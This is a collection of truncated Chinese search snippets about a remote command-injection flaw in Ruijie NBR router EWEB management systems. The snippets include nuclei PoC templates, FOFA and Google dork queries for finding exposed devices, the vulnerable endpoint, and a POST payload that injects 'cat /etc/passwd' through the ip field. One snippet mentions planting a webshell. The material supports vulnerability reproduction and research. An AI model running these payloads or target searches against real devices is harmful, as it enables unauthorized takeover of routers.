Python id:Ruijie-EWEB-auth-REC info:name:auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。 author:WLF severity:high metadata:fofa-query:body="cgi-bin/luci"&&body="#f47f3e" variables: filename: "{{to_lower(rand_base(10))}}" boundary: "{{to_lower(rand_base...
基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml 代码语言:yaml 复制 id:ruijie-EWEB-auth-RCEinfo:name:auth接口存在RCE漏洞author:someoneseverity:criticaldescription:auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。reference:metadata:verified:truemax-request:1fofa-query:bo...
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 0x02 漏洞等级 0x03 漏洞验证 访问锐捷EWEB网管系统界面,使用BurpSuite工具抓取数据包。 使用POST型数据包检测语句执行whoami命令,并将执行结果保存到test.txt中。 代码语言:javascript 复制 POST/guest_auth/guestIsUp....
查资料知道该漏洞是命令注入且绕过了鉴权,漏洞起始于sysauth 那我们就搜索sysauth字段,eweb/api.lua这行很显眼,很像是无鉴权相关的东西 进文件看看,只有这行内容,显然是定义了一个入口\api\auth对应的rpc函数rpc_auth,并定义了它不需要鉴权 entry({"api","auth"}, call("rpc_auth"), nil).sysauth= false ...
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限 漏洞影响 锐捷NBR路由器 EWEB网管系统 FOFA title="锐捷网络-EWEB网管系统" icon_hash="-692947551" 漏洞复现 出现漏洞的文件在/guest_auth/guestIsUp.php <?php //查询用户是否上线了 ...
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 漏洞影响: 锐捷NBR路由器 EWEB网关系统 漏洞复现: 首先打开网关系统 然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开ha...
锐捷NBR路由器EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt 利用此漏洞我们可以将一句话木马写入shell ...
漏洞证明: code 区域 代码语言:javascript 复制 google 关键字: intitle:锐捷网络 intitle:登录界面 (貌似没有百度抓的多) baidu 关键字: intitle:锐捷网络 intitle:登录界面 我任意选择一个尝试进行cookie 欺骗,使用锐捷自带的账户 guest 尝试登陆 F5刷新一下.. ...